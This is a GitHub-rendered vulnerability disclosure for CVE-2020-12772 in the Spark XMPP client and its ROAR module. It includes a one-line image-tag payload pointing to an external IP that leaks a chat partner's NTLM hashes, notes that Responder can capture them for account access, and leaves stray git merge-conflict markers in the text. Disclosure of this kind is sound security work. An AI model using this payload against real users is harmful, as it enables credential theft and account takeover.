Skip to content

Latest commit

 

History

History
30 lines (21 loc) · 1.17 KB

CVE-2020-12772.md

File metadata and controls

30 lines (21 loc) · 1.17 KB

CVE-2020-12772

Description

<<<<<<< HEAD When @4nqr34z and myself, @theart42, were building a CTF box, we came accross an interesting

When @4nqr34z and myself, @theart42, were building a CTF box, we came accross an interesting

2e226274aae6df71614d40d24e76348b882194de vulnerability in the Spark XMPP client and its ROAR module.

Spark client

When we opened a chat with another user, we could send an <img tag to that user with an external URL as the source of that image, like this:

<img src=[external_ip]/test.img>

Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user you are chatting with!

Exploitation

For our CTF box, this was golden. By running responder, we could capture the hashes and use them to gain access to the user account and escalate our privileges (depending on the user of course).

Responder

Mitigation

The developer has been notified and a fix is underway